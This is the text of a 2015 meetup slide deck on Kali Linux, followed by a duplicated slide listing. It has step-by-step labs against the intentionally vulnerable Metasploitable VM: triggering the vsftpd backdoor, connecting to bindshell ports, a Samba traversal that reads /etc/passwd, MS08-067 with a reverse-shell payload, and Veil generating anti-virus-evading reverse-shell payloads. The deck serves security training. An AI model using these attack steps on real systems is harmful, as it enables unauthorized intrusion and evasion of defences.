What is Kali Linux?
CleveSec MeetUp Group
Westlake, Ohio
Welcome
Welcome
Tony Godfrey is the CEO / Linux Consultant
of Falconer Technologies (est 2003) specializing in
Linux. He has written several articles on the body
of knowledge of security administration, is a
regular contributor to a variety of Linux
publications, and has written technical content for
Linux education nation-wide at the college level.
He also teaches topics covering Linux,
Network Security, Cisco routers, Cybercrime and
System Forensics.
Thank you
Falconer Technologies
TonyGodfrey@FalconerTechnologies.com
877 / TUX RULZ or 877 / 889-7859
Welcome
Side Note:
I put a lot of extra materials, websites, &
definitions in the ‘Notes’ section of this PPT.
Overview of Presentation
Intro, Description, How used, Background
Extra Info, Kali in a Box, Raspberry PI
Tools, Overview, & Conclusion
Setting up the Environments
CLI 101 / Tools 101
Kali 101, 201, & 301
Presentation on Kali Linux
Intro
Who or What is ‘Kali’?
Who is Kali?
Kali the mother goddess despite her
fearful appearance, protects the good
against the evil. Unlike the other Hindu
deities her form is pretty scary and
formidable, intended to scare away the
demons both literally and figuratively!
Anu Yadavalli
Hindu Kali
What is Kali Linux?
Kali Linux is a Debian-derived Linux
distribution designed for digital forensics
and penetration testing. It is maintained
and funded by Offensive Security Ltd. It
was developed by Mati Aharoni and Devon
Kearns of Offensive Security through the
rewrite of BackTrack, their previous
forensics Linux distribution.
BackTrack?
Kali Linux is the ‘rebirth’ of BackTrack
Linux. This is a custom distribution
designed for security testing for all skill
levels from novice to expert. It is the
largest collection of wireless hacking,
server exploiting, web application
assessing, social-engineering tools available
in a single Linux distribution.
Developers - March 12, 2013
“Seven years of developing BackTrack
Linux has taught us a significant amount
about what we, and the security
community, think a penetration testing
distribution should look like. We’ve taken all
of this knowledge and experience and
implemented it in our “next generation”
penetration testing distribution.”
Developers - March 12, 2013
“After a year of silent development,
we are incredibly proud to announce the
release and public availability of “Kali
Linux“, the most advanced, robust, and
stable penetration testing distribution to
date.
Kali is a more mature, secure, and
enterprise-ready version of BackTrack
Linux.”
Warning! Warning!
Kali Linux’s developers would like
everyone to use Kali Linux. But, Kali is a
Linux distribution specifically geared
towards professional penetration testing
and security auditing and as such. It is NOT
a recommended distribution for those
unfamiliar with Linux.
Hardware / Software
Kali likes its own dedicated hardware.
If you are learning about Kali and
penetration testing (Metaspolitable) then a
virtualized environment may be a
consideration. VMware Player 5 works well
and set the RAM to 1gb.
Hardware / Software
Kali recommends 10gb for the initial
install, 512MB RAM min, i386/AMD64,
CD/DVD / USB support.
Now…if ‘Veil’ is installed (+ 10gb) and
doing the updates/upgrades (+ 5gb), and
don’t forget the Alfa antenna.
http://www.kali.org/
Other guys?
Other guys? BackBox
BackBox is an Ubuntu-based
distribution developed to perform
penetration tests and security assessments.
It provides a minimal yet complete desktop
environment, thanks to its own software
repositories, which are always updated to
the latest stable versions of the most often
used and best-known ethical hacking tools.
Other guys? Pentoo
Pentoo is a Live CD/USB designed for
penetration testing and security
assessment. Based on Gentoo, it is
provided both as 32/64 bit installable
livecd. It features packet injection patched
wifi drivers, GPGPU cracking software, and
lots of tools for penetration testing and
security assessment.
Other guys? BlackBuntu
BlackBuntu is distribution for
penetration testing which was specially
designed for security training students and
practitioners of information security.
Blackbuntu is penetration testing
distribution with GNOME Desktop
Environment. It's currently being built
using the Ubuntu 10.10.
Other guys? EnGarde
EnGarde Secure Linux was designed to
support features suitable for individuals,
students, security enthusiasts, and those
wishing to evaluate the level of security and
ease of management available in Guardian
Digital enterprise products.
Other guys? A few more….
Presentation on Kali Linux
Categories & Websites
What’s in the box, Pandora?
There are several categories
Top 10 Security Tools
Information Gathering
Vulnerability Analysis
Web Applications / Password Attacks
Wireless Attacks / Exploitation Tools
Sniffing/Spoofing / Maintaining Access
Reverse Engineering
Stress Testing / Hardware Hacking
Forensics / Reporting Tools
System Services
Metapackages also exist
Kali Information
See ‘Notes’ section in this slide
Information
Getting your pentesting lab ready
Hacking tutorial
20 things to do after installing Kali
Cracking WEP
6 Resources & Tutorials on Kali
Kali & More PenTesting
See ‘Notes’ section in this slide
Kali & More PenTesting
PenTest Tools
Penetration Testing Tools
PenTestMag
Chrome as a PenTest Tool
Firefox as a PenTest Tool
Kali-specific Websites
See ‘Notes’ section in this slide
Kali-specific Websites
Kali4Hackers
Hacking with Kali Linux
YouTube
Kali Linux
Hack with Kali Linux
Kali Publications
See ‘Notes’ section in this slide
Kali Publications
Kali Book
BackTrack to Kali
Basic Security Testing with Kali
Kali Linux Assuring Security
Kali in a box?
Do you want to run Kali on tablet or phone?
http://www.kali.org/how-to/kali-linux-android-linux-deploy/
Kali in a box?
Basically….
1.Get a tablet
1. Install ‘Linux Deploy’
2. Install Samsung Kies on PC
3. Tablet - USB Debugging ON
4. Install SuperOneClick on PC
5. Wait 5 minutes…
6. Done
Kali + Nexus = NetHunter
Do you want to run Kali on a Nexus?
http://www.kali.org/kali-linux-nethunter/
Kali on a Nexus?
Kali & Lifehacker
How to hack your own network and beef up
its security with Kali Linux
http://lifehacker.com/how-to-hack-your-own-network-and-
beef-up-its-security-w-1649785071
Kali & Raspberry PI
See ‘Notes’ section in this slide
What is Metaspolitable?
See ‘Notes’ section in this slide
Metaspolitable?
Metasploitable is an intentionally
vulnerable Linux virtual machine. This VM
can be used to conduct security training,
test security tools, and practice common
penetration testing techniques.
The default login and password is
msfadmin:msfadmin
Presentation on Kali Linux
DVD, Tools, Demo
What’s on the Drive?
/books
◦Official Kali Guide
◦eForensics
◦Other published materials
/media
◦7-Zip, kali_iso, metaspolitable doc,
SD_formatter, Unetbootin, USB_installer,
VMware, Win32_DiskImager
/PPT
Legend
 We’re going to type something
 We’re going to make a note
 Might be a question?
 We’re going to click on something
 Recon  Attack
traceroute
 traceroute
Essentially, ‘tracert’ in Windows
 traceroute –i eth0 <Target IP>
It displays the route (path) and measuring transit delays of packets
across an Internet Protocol (IP) network
traceroute
nmap

nmap –p0-65535 <Target IP> | less
A security scanner used to discover hosts and services on a
computer network, thus creating a "map" of the network
nmap
nmap

nmap –sS –Pn –A <Target IP>
A security scanner used to discover hosts and services on a
computer network – ‘sS’ is stealth scan, ‘Pn’ not to run a ping scan,
and ‘A’ is O/S detection, services, service pack.
nmap
rpcinfo

rpcinfo –p <Target IP>
A utility makes a Remote Procedure Call (RPC) to an RPC server and reports
what it finds. It lists all programs registered with the port mapper on the
specified host.
rpcinfo
tcpdump
On Kali…
tcpdump –I eth0 src <Target IP>
On Metaspolitable…
ping www.yahoo.com
open a Browser & go to CNN.com
nikto
On Kali
 nikto –h <Target IP>
Its an Open Source (GPL) web server scanner which performs
comprehensive tests against web servers for multiple items, including over
6700 potentially dangerous files/CGIs, checks for outdated versions of over
1250 servers, and version specific problems on over 270 servers.
nikto
whatweb
From Kali
 whatweb <Target IP>
 whatweb –v <Target IP>
 whatweb –a 4 <Target IP>
WhatWeb recognizes web technologies including content management
systems (CMS), blogging platforms, statistic/analytics packages, JavaScript
libraries, web servers, and embedded devices.
whatweb
Zenmap (GUI for nmap)
Let’s run Zenmap
 Applications  Kali Linux
 Information Gathering
 DNS Analysis
 Zenmap
Zenmap (GUI for nmap)
SHODAN
Let’s run SHODAN
 Open a browser
 www.shodanhq.com
 type in ‘almost anything’
 …Be very nervous…
SHODAN
dmitry
If you want something more basic…dmitry
 dmitry –s <domain.com>
 It gives you site names & IP’s
dmitry
veil
Kali has many built-in tools, but you
can always install even more (Debian-
based). You may always wish to add more
such as veil.
veil
Remote shell payload generator
that can bypass many anti-virus
programs.
veil
veil
Presentation on Kali Linux
Final Thoughts
Thank you
Falconer Technologies
TonyGodfrey@FalconerTechnologies.com
877 / TUX RULZ or 877 / 889-7859
Use your powers for good
Thank You
The second part of this slide deck covers more
tools and hands-on.
Presentation on Kali Linux
Lab #1 & Prep
Getting Ready…
- Let’s make a folder called  kali_2015
- Copy the DVD contents into that folder
- Install 7-Zip
- Install VMware Player
Let’s make sure the virtual environments are working and can ‘ping’
each other
VMware Player
Press <CTRL><Alt> at the same time to
be released from the current virtual
environment. You can then do a normal
<Alt><Tab> to toggle between different
applications.
Logins / Passwords
Kali Login  root
Kali Password  password
Metaspolitable Login  msfadmin
Metaspolitable Password  msfadmin
Download Metaspolitable from:
http://sourceforge.net/projects/metasploitable/
Metaspolitable V/E
 Login  msfadmin
 Password  msfadmin
 ifconfig
 Jot down the IP & Netmask
 route
 Jot down the Gateway
Metaspolitable V/E
Virtual Environment #1
◦Metaspolitable
 Go to TERMINAL
rlogin –l root <IP Address>
cd /tmp
ls -l ...vs... ls -la
rm .X0-lock
 startx
Kali V/E
 Login  root
 Password  password
 ifconfig
 Jot down the IP & Netmask
 route
 Jot down the Gateway
Kali V/E
Go to:
Applications  System Tools
 Preferences  System Settings
 Display  Resolution: ____
Then…[Apply]
Kali Updating
From the command line, type 
apt-get update && apt-get upgrade
Note: This has already been done to save time, but should be done
after a new installation.
Presentation on Kali Linux
Lab #2 – Command Line Tools
Command Line Tools
Presentation on Kali Linux
Legend
 We’re going to type something
 We’re going to make a note
 Might be a question?
 We’re going to click on something
 Recon  Attack
ping
 ping
Packet InterNet Groper
Port = 8
Establishes physical connectivity between two entities
 (from Kali) ping <Target IP>
Did it echo back?
top
 top
Tells us what services are running,
processes, memory allocation
Basically, a live system monitor
df
 df
Tells us how much space is available
or ‘disk free’
du
 du
Tells us how much space is taken or
‘disk used’.
You can get a shorter report by…
 ‘du –s’ … (disk used –summary)
free
 free
How much ‘free’ memory is available
ls
 ls
This is for ‘list’
 ls –l (list –long)
 ls -la (list – long – all attributes)
pwd
 pwd
Directory structure
Means ‘path to working directory’ or
‘print working directory’
ps / ps aux / pstree
 ps
Means ‘Process Status’
◦aux – auxiliary view
◦pstree – shows parent/child relationships
◦Windows – tasklist / taskkill
Kill - Stops a process (ex: kill PID)
Presentation on Kali Linux
Lab #3 – CLI & Services
CLI & Services
Presentation on Kali Linux
traceroute
 traceroute
Essentially, ‘tracert’ in Windows
 traceroute –i eth0 <Target IP>
It displays the route (path) and measuring transit delays of packets
across an Internet Protocol (IP) network
nmap

nmap –p0-65535 <Target IP> | less
A security scanner used to discover hosts and services on a
computer network, thus creating a "map" of the network
nmap

nmap –sS –Pn –A <Target IP>
A security scanner used to discover hosts and services on a
computer network – ‘sS’ is stealth scan, ‘Pn’ not to run a ping scan,
and ‘A’ is O/S detection, services, service pack.
rlogin (from Metaspolitable)
 rlogin –l root <Target IP>
 whoami
 tcpdump -i eth0 host <Target IP>
A packet analyzer that runs under the command line. It allows the
user to intercept and display TCP/IP and other packets being
transmitted or received over a network to which the computer is
attached.
rpcinfo

rpcinfo –p <Target IP>
A utility makes a Remote Procedure Call (RPC) to an RPC server and reports
what it finds. It lists all programs registered with the port mapper on the
specified host.
showmount
 showmount –e <Target IP>
 showmount –a <Target IP>
It displays a list of all clients that have remotely mounted a file system from a
specified machine in the Host parameter. This information is maintained by
the [mountd] daemon on the Host parameter.
telnet
 telnet <Target IP> 21
After '220...'
 user backdoored:)
 <CTRL><]>
 quit
Port 20/21 is FTP
telnet
 telnet <Target IP> 6200
After 'Escape character...',
 id;
<CTRL><]>
 quit
Port 6200 - Oracle Notification Service remote port Oracle Application Server
telnet
 telnet <Target IP> 6667
IRC (Internet Relay Chat)
Many trojans/backdoors also use this port: Dark Connection Inside, Dark FTP,
Host Control, NetBus worm , ScheduleAgent, SubSeven, Trinity, WinSatan,
Vampire, Moses, Maniacrootkit, kaitex, EGO.
telnet
 telnet <Target IP> 1524
After 'root@meta....',
 id
Many attack scripts install a backdoor shell at this port (especially those
against Sun systems via holes in sendmail and RPC services like statd,
ttdbserver, and cmsd). Connections to port 600/pcserver also have this
problem. Note: ingreslock, Trinoo; talks UDP/TCP.
Presentation on Kali Linux
Lab #4 – Working w/Metaspolitable
smbclient
 smbclient –L <//Target IP>
 msfconsole
...wait, wait, wait..., then
use auxiliary/admin/smb/samba_symlink_traversal
 set RHOST <Target IP>
 set SMBSHARE tmp
smbclient
 exploit
...Connecting to the server.....
...<yadda, yadda, yadda>...
...Auxiliary module....
At the prompt, type  exit
smbclient
 smbclient //<Target IP>/tmp
Do you get the 'smb: >' prompt?
 cd rootfs
 cd etc
 more passwd
Do you get a list of all user accts?
tcpdump
On Kali…
tcpdump –I eth0 src <Target IP>
On Metaspolitable…
ping www.yahoo.com
open a Browser & go to CNN.com
netdiscover
On Kali
netdiscover –i eth0 –r <Target IP>/24
Netdiscover is an active/passive address reconnaissance tool, mainly
developed for those wireless networks without DHCP server, when you are
wardriving. It can be also used on hub/switched networks.
nikto
On Kali
 nikto –h <Target IP>
Its an Open Source (GPL) web server scanner which performs
comprehensive tests against web servers for multiple items, including over
6700 potentially dangerous files/CGIs, checks for outdated versions of over
1250 servers, and version specific problems on over 270 servers.
sqlmap
On Kali
sqlmap –u http://<Target IP> --dbs
It is an open source penetration testing tool that automates the process of
detecting and exploiting SQL injection flaws and taking over of database
servers.
Wasp Services
From Kali – open IceWeasel
 http://<Target IP>/
Research: Multillidae <p. 8>
The Mutillidae are a family of more than 3,000 species of wasps (despite the
names) whose wingless females resemble large, hairy ants. Their common
name ‘velvet ant’ refers to their dense pile of hair which most often is bright
scarlet or orange, but may also be black, white, silver, or gold.
Web Services
From Kali – open IceWeasel
 http://<Target IP>/
Research: Multillidae <p. 8>
Mutillidae is a free, open source web application provided to allow security
enthusiest to pen-test and hack a web application
whatweb
From Kali
 whatweb <Target IP>
 whatweb –v <Target IP>
 whatweb –a 4 <Target IP>
WhatWeb recognizes web technologies including content management
systems (CMS), blogging platforms, statistic/analytics packages, JavaScript
libraries, web servers, and embedded devices.
Presentation on Kali Linux
Lab #5 - msfconsole
From Kali - msfconsole
Presentation on Kali Linux
msfconsole
From Kali
 service postgresql start
 service metasploit start
 msfconsole
Let’s fire up the database (PostGreSql) – start Metasploit – start msfconsole
We will then take a look at the built-in exploit tools
msfconsole
From [msf>] console
 help search
 show exploits
 search dns
‘Help Search’ shows all of the options, ‘Show Exploits’ show all the built-in
exploits in msfconsole, ‘Search DNS’ will look for any DNS exploits.
msfconsole
From [msf>] console
 search Microsoft
 search diablo
 search irc
 search http
Let’s try a few more to see what they do….
msfconsole
From [msf>] console, search for ‘unreal’
 info <exploit>
 use <exploit>
 show options
 LHOST, RHOST, LPORT, RPORT
msfconsole
From [msf>] console (ex: unreal)
 set RHOST <IP Address>
 show options
 exploit

msfconsole
From [msf>] console, search for ‘twiki’
 info <exploit>
 use <exploit>
 show options
 LHOST, RHOST, LPORT, RPORT
msfconsole
From [msf>] console (ex: ‘twiki’)
 set RHOST <IP Address>
 show options
 exploit

msfconsole
From [msf>] console, (target: Win XP)
 use exploit/windows/smb/ms08_067_netapi
 show options
 show targets
 set target 2
msfconsole
From [msf>] console, (target: Win XP)
 show options
 show advanced
 show targets
 show payloads
msfconsole
From [msf>] console, (target: Win XP)
 set payload windows/shell_reverse_tcp
 show options
 set LHOST <Kali IP Address>
 set RHOST <Target IP Address>
msfconsole
From [msf>] console, (target: Win XP)
 show options
 exploit
 Any errors?

Presentation on Kali Linux
Lab #6 – more GUI
From Kali – more GUI
Presentation on Kali Linux
Zenmap
Let’s run Zenmap
 Applications  Kali Linux
 Information Gathering
 DNS Analysis
 Zenmap
SHODAN
Let’s run SHODAN
 Open a browser
 www.shodanhq.com
 type in ‘almost anything’
 …Be very nervous…
FERN
Let’s run FERN
 Kali Linux
 Wireless Attacks
 Wireless Tools
 fern-wifi-cracker
recon-ng
Kali has many built-in tools, but you
can always install more (Debian-based).
But, you may always wish to add more
such as recon-ng.
recon-ng
automated info gathering and
network reconnaissance.
recon-ng
Let’s run recon-ng…
 cd /opt/recon-ng
 /usr/bin/python recon-ng
 show modules
 recon/hosts/gather/http/web/google_site
recon-ng
Let’s run recon-ng…
 set DOMAIN <domain.com>
 run (…let this run awhile…)
 back (…previous level…)
 show modules
recon-ng
Let’s run recon-ng…
 use reporting/csv
 run
 Will add your new information to
/usr/share/recon-ng/workspaces/default
dmitry
If you want something more basic…dmitry
 dmitry –s <domain.com>
 It gives you site names & IP’s
veil
Kali has many built-in tools, but you
can always install even more (Debian-
based). You may always wish to add more
such as veil.
veil
Remote shell payload generator
that can bypass many anti-virus
programs.
veil
Let’s run veil
 veil-evasion
 list (available payloads list)
 use 13 (powershell/VirtualAlloc)
 generate
veil
Let’s run veil
 1 (msfvenom)
 [ENTER] (accept default)
 Value for LHOST (Target IP)
 Value for LPORT (ex: 4000)
veil
Let’s run veil
 Output name (“Squatch”)
 It will store this new batch file to
the  /usr/share/veil/output/source
folder. When the file is run from the target
machine, it will attempt to do a reverse
shell session with Kali.
Presentation on Kali Linux
Final Thoughts
Thank you
Thank you for your time.
Falconer Technologies
TonyGodfrey@FalconerTechnologies.com
877 / TUX RULZ or 877 / 889-7859
Use your powers for good
Thank You

Kali Linux - CleveSec 2015

  • 1.
    What is KaliLinux? CleveSec MeetUp Group Westlake, Ohio
  • 2.
  • 3.
    Welcome Tony Godfrey isthe CEO / Linux Consultant of Falconer Technologies (est 2003) specializing in Linux. He has written several articles on the body of knowledge of security administration, is a regular contributor to a variety of Linux publications, and has written technical content for Linux education nation-wide at the college level. He also teaches topics covering Linux, Network Security, Cisco routers, Cybercrime and System Forensics.
  • 4.
  • 5.
    Welcome Side Note: I puta lot of extra materials, websites, & definitions in the ‘Notes’ section of this PPT.
  • 6.
    Overview of Presentation Intro,Description, How used, Background Extra Info, Kali in a Box, Raspberry PI Tools, Overview, & Conclusion Setting up the Environments CLI 101 / Tools 101 Kali 101, 201, & 301
  • 7.
  • 8.
    Who or Whatis ‘Kali’?
  • 9.
    Who is Kali? Kalithe mother goddess despite her fearful appearance, protects the good against the evil. Unlike the other Hindu deities her form is pretty scary and formidable, intended to scare away the demons both literally and figuratively! Anu Yadavalli
  • 10.
  • 11.
    What is KaliLinux? Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It is maintained and funded by Offensive Security Ltd. It was developed by Mati Aharoni and Devon Kearns of Offensive Security through the rewrite of BackTrack, their previous forensics Linux distribution.
  • 12.
    BackTrack? Kali Linux isthe ‘rebirth’ of BackTrack Linux. This is a custom distribution designed for security testing for all skill levels from novice to expert. It is the largest collection of wireless hacking, server exploiting, web application assessing, social-engineering tools available in a single Linux distribution.
  • 13.
    Developers - March12, 2013 “Seven years of developing BackTrack Linux has taught us a significant amount about what we, and the security community, think a penetration testing distribution should look like. We’ve taken all of this knowledge and experience and implemented it in our “next generation” penetration testing distribution.”
  • 14.
    Developers - March12, 2013 “After a year of silent development, we are incredibly proud to announce the release and public availability of “Kali Linux“, the most advanced, robust, and stable penetration testing distribution to date. Kali is a more mature, secure, and enterprise-ready version of BackTrack Linux.”
  • 15.
    Warning! Warning! Kali Linux’sdevelopers would like everyone to use Kali Linux. But, Kali is a Linux distribution specifically geared towards professional penetration testing and security auditing and as such. It is NOT a recommended distribution for those unfamiliar with Linux.
  • 16.
    Hardware / Software Kalilikes its own dedicated hardware. If you are learning about Kali and penetration testing (Metaspolitable) then a virtualized environment may be a consideration. VMware Player 5 works well and set the RAM to 1gb.
  • 17.
    Hardware / Software Kalirecommends 10gb for the initial install, 512MB RAM min, i386/AMD64, CD/DVD / USB support. Now…if ‘Veil’ is installed (+ 10gb) and doing the updates/upgrades (+ 5gb), and don’t forget the Alfa antenna.
  • 18.
  • 21.
  • 22.
    Other guys? BackBox BackBoxis an Ubuntu-based distribution developed to perform penetration tests and security assessments. It provides a minimal yet complete desktop environment, thanks to its own software repositories, which are always updated to the latest stable versions of the most often used and best-known ethical hacking tools.
  • 23.
    Other guys? Pentoo Pentoois a Live CD/USB designed for penetration testing and security assessment. Based on Gentoo, it is provided both as 32/64 bit installable livecd. It features packet injection patched wifi drivers, GPGPU cracking software, and lots of tools for penetration testing and security assessment.
  • 24.
    Other guys? BlackBuntu BlackBuntuis distribution for penetration testing which was specially designed for security training students and practitioners of information security. Blackbuntu is penetration testing distribution with GNOME Desktop Environment. It's currently being built using the Ubuntu 10.10.
  • 25.
    Other guys? EnGarde EnGardeSecure Linux was designed to support features suitable for individuals, students, security enthusiasts, and those wishing to evaluate the level of security and ease of management available in Guardian Digital enterprise products.
  • 26.
    Other guys? Afew more….
  • 27.
    Presentation on KaliLinux Categories & Websites
  • 28.
    What’s in thebox, Pandora?
  • 29.
    There are severalcategories Top 10 Security Tools Information Gathering Vulnerability Analysis Web Applications / Password Attacks Wireless Attacks / Exploitation Tools Sniffing/Spoofing / Maintaining Access Reverse Engineering Stress Testing / Hardware Hacking Forensics / Reporting Tools System Services
  • 30.
  • 31.
    Kali Information See ‘Notes’section in this slide
  • 32.
    Information Getting your pentestinglab ready Hacking tutorial 20 things to do after installing Kali Cracking WEP 6 Resources & Tutorials on Kali
  • 33.
    Kali & MorePenTesting See ‘Notes’ section in this slide
  • 34.
    Kali & MorePenTesting PenTest Tools Penetration Testing Tools PenTestMag Chrome as a PenTest Tool Firefox as a PenTest Tool
  • 35.
  • 36.
    Kali-specific Websites Kali4Hackers Hacking withKali Linux YouTube Kali Linux Hack with Kali Linux
  • 37.
    Kali Publications See ‘Notes’section in this slide
  • 38.
    Kali Publications Kali Book BackTrackto Kali Basic Security Testing with Kali Kali Linux Assuring Security
  • 39.
    Kali in abox? Do you want to run Kali on tablet or phone? http://www.kali.org/how-to/kali-linux-android-linux-deploy/
  • 40.
    Kali in abox? Basically…. 1.Get a tablet 1. Install ‘Linux Deploy’ 2. Install Samsung Kies on PC 3. Tablet - USB Debugging ON 4. Install SuperOneClick on PC 5. Wait 5 minutes… 6. Done
  • 41.
    Kali + Nexus= NetHunter Do you want to run Kali on a Nexus? http://www.kali.org/kali-linux-nethunter/
  • 42.
    Kali on aNexus?
  • 43.
    Kali & Lifehacker Howto hack your own network and beef up its security with Kali Linux http://lifehacker.com/how-to-hack-your-own-network-and- beef-up-its-security-w-1649785071
  • 44.
    Kali & RaspberryPI See ‘Notes’ section in this slide
  • 47.
    What is Metaspolitable? See‘Notes’ section in this slide
  • 48.
    Metaspolitable? Metasploitable is anintentionally vulnerable Linux virtual machine. This VM can be used to conduct security training, test security tools, and practice common penetration testing techniques. The default login and password is msfadmin:msfadmin
  • 49.
    Presentation on KaliLinux DVD, Tools, Demo
  • 50.
    What’s on theDrive? /books ◦Official Kali Guide ◦eForensics ◦Other published materials /media ◦7-Zip, kali_iso, metaspolitable doc, SD_formatter, Unetbootin, USB_installer, VMware, Win32_DiskImager /PPT
  • 51.
    Legend  We’re goingto type something  We’re going to make a note  Might be a question?  We’re going to click on something  Recon  Attack
  • 52.
    traceroute  traceroute Essentially, ‘tracert’in Windows  traceroute –i eth0 <Target IP> It displays the route (path) and measuring transit delays of packets across an Internet Protocol (IP) network
  • 53.
  • 54.
    nmap  nmap –p0-65535 <TargetIP> | less A security scanner used to discover hosts and services on a computer network, thus creating a "map" of the network
  • 55.
  • 56.
    nmap  nmap –sS –Pn–A <Target IP> A security scanner used to discover hosts and services on a computer network – ‘sS’ is stealth scan, ‘Pn’ not to run a ping scan, and ‘A’ is O/S detection, services, service pack.
  • 57.
  • 58.
    rpcinfo  rpcinfo –p <TargetIP> A utility makes a Remote Procedure Call (RPC) to an RPC server and reports what it finds. It lists all programs registered with the port mapper on the specified host.
  • 59.
  • 60.
    tcpdump On Kali… tcpdump –Ieth0 src <Target IP> On Metaspolitable… ping www.yahoo.com open a Browser & go to CNN.com
  • 61.
    nikto On Kali  nikto–h <Target IP> Its an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/CGIs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers.
  • 62.
  • 63.
    whatweb From Kali  whatweb<Target IP>  whatweb –v <Target IP>  whatweb –a 4 <Target IP> WhatWeb recognizes web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices.
  • 64.
  • 65.
    Zenmap (GUI fornmap) Let’s run Zenmap  Applications  Kali Linux  Information Gathering  DNS Analysis  Zenmap
  • 66.
  • 67.
    SHODAN Let’s run SHODAN Open a browser  www.shodanhq.com  type in ‘almost anything’  …Be very nervous…
  • 68.
  • 69.
    dmitry If you wantsomething more basic…dmitry  dmitry –s <domain.com>  It gives you site names & IP’s
  • 70.
  • 72.
    veil Kali has manybuilt-in tools, but you can always install even more (Debian- based). You may always wish to add more such as veil. veil Remote shell payload generator that can bypass many anti-virus programs.
  • 73.
  • 74.
  • 75.
    Presentation on KaliLinux Final Thoughts
  • 77.
  • 78.
  • 79.
  • 80.
    The second partof this slide deck covers more tools and hands-on.
  • 81.
    Presentation on KaliLinux Lab #1 & Prep
  • 82.
    Getting Ready… - Let’smake a folder called  kali_2015 - Copy the DVD contents into that folder - Install 7-Zip - Install VMware Player Let’s make sure the virtual environments are working and can ‘ping’ each other
  • 83.
    VMware Player Press <CTRL><Alt>at the same time to be released from the current virtual environment. You can then do a normal <Alt><Tab> to toggle between different applications.
  • 84.
    Logins / Passwords KaliLogin  root Kali Password  password Metaspolitable Login  msfadmin Metaspolitable Password  msfadmin Download Metaspolitable from: http://sourceforge.net/projects/metasploitable/
  • 85.
    Metaspolitable V/E  Login msfadmin  Password  msfadmin  ifconfig  Jot down the IP & Netmask  route  Jot down the Gateway
  • 86.
    Metaspolitable V/E Virtual Environment#1 ◦Metaspolitable  Go to TERMINAL rlogin –l root <IP Address> cd /tmp ls -l ...vs... ls -la rm .X0-lock  startx
  • 87.
    Kali V/E  Login root  Password  password  ifconfig  Jot down the IP & Netmask  route  Jot down the Gateway
  • 88.
    Kali V/E Go to: Applications System Tools  Preferences  System Settings  Display  Resolution: ____ Then…[Apply]
  • 89.
    Kali Updating From thecommand line, type  apt-get update && apt-get upgrade Note: This has already been done to save time, but should be done after a new installation.
  • 90.
    Presentation on KaliLinux Lab #2 – Command Line Tools
  • 91.
  • 92.
    Legend  We’re goingto type something  We’re going to make a note  Might be a question?  We’re going to click on something  Recon  Attack
  • 93.
    ping  ping Packet InterNetGroper Port = 8 Establishes physical connectivity between two entities  (from Kali) ping <Target IP> Did it echo back?
  • 94.
    top  top Tells uswhat services are running, processes, memory allocation Basically, a live system monitor
  • 95.
    df  df Tells ushow much space is available or ‘disk free’
  • 96.
    du  du Tells ushow much space is taken or ‘disk used’. You can get a shorter report by…  ‘du –s’ … (disk used –summary)
  • 97.
    free  free How much‘free’ memory is available
  • 98.
    ls  ls This isfor ‘list’  ls –l (list –long)  ls -la (list – long – all attributes)
  • 99.
    pwd  pwd Directory structure Means‘path to working directory’ or ‘print working directory’
  • 100.
    ps / psaux / pstree  ps Means ‘Process Status’ ◦aux – auxiliary view ◦pstree – shows parent/child relationships ◦Windows – tasklist / taskkill Kill - Stops a process (ex: kill PID)
  • 101.
    Presentation on KaliLinux Lab #3 – CLI & Services
  • 102.
  • 103.
    traceroute  traceroute Essentially, ‘tracert’in Windows  traceroute –i eth0 <Target IP> It displays the route (path) and measuring transit delays of packets across an Internet Protocol (IP) network
  • 104.
    nmap  nmap –p0-65535 <TargetIP> | less A security scanner used to discover hosts and services on a computer network, thus creating a "map" of the network
  • 105.
    nmap  nmap –sS –Pn–A <Target IP> A security scanner used to discover hosts and services on a computer network – ‘sS’ is stealth scan, ‘Pn’ not to run a ping scan, and ‘A’ is O/S detection, services, service pack.
  • 106.
    rlogin (from Metaspolitable) rlogin –l root <Target IP>  whoami  tcpdump -i eth0 host <Target IP> A packet analyzer that runs under the command line. It allows the user to intercept and display TCP/IP and other packets being transmitted or received over a network to which the computer is attached.
  • 107.
    rpcinfo  rpcinfo –p <TargetIP> A utility makes a Remote Procedure Call (RPC) to an RPC server and reports what it finds. It lists all programs registered with the port mapper on the specified host.
  • 108.
    showmount  showmount –e<Target IP>  showmount –a <Target IP> It displays a list of all clients that have remotely mounted a file system from a specified machine in the Host parameter. This information is maintained by the [mountd] daemon on the Host parameter.
  • 109.
    telnet  telnet <TargetIP> 21 After '220...'  user backdoored:)  <CTRL><]>  quit Port 20/21 is FTP
  • 110.
    telnet  telnet <TargetIP> 6200 After 'Escape character...',  id; <CTRL><]>  quit Port 6200 - Oracle Notification Service remote port Oracle Application Server
  • 111.
    telnet  telnet <TargetIP> 6667 IRC (Internet Relay Chat) Many trojans/backdoors also use this port: Dark Connection Inside, Dark FTP, Host Control, NetBus worm , ScheduleAgent, SubSeven, Trinity, WinSatan, Vampire, Moses, Maniacrootkit, kaitex, EGO.
  • 112.
    telnet  telnet <TargetIP> 1524 After 'root@meta....',  id Many attack scripts install a backdoor shell at this port (especially those against Sun systems via holes in sendmail and RPC services like statd, ttdbserver, and cmsd). Connections to port 600/pcserver also have this problem. Note: ingreslock, Trinoo; talks UDP/TCP.
  • 113.
    Presentation on KaliLinux Lab #4 – Working w/Metaspolitable
  • 114.
    smbclient  smbclient –L<//Target IP>  msfconsole ...wait, wait, wait..., then use auxiliary/admin/smb/samba_symlink_traversal  set RHOST <Target IP>  set SMBSHARE tmp
  • 115.
    smbclient  exploit ...Connecting tothe server..... ...<yadda, yadda, yadda>... ...Auxiliary module.... At the prompt, type  exit
  • 116.
    smbclient  smbclient //<TargetIP>/tmp Do you get the 'smb: >' prompt?  cd rootfs  cd etc  more passwd Do you get a list of all user accts?
  • 117.
    tcpdump On Kali… tcpdump –Ieth0 src <Target IP> On Metaspolitable… ping www.yahoo.com open a Browser & go to CNN.com
  • 118.
    netdiscover On Kali netdiscover –ieth0 –r <Target IP>/24 Netdiscover is an active/passive address reconnaissance tool, mainly developed for those wireless networks without DHCP server, when you are wardriving. It can be also used on hub/switched networks.
  • 119.
    nikto On Kali  nikto–h <Target IP> Its an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/CGIs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers.
  • 120.
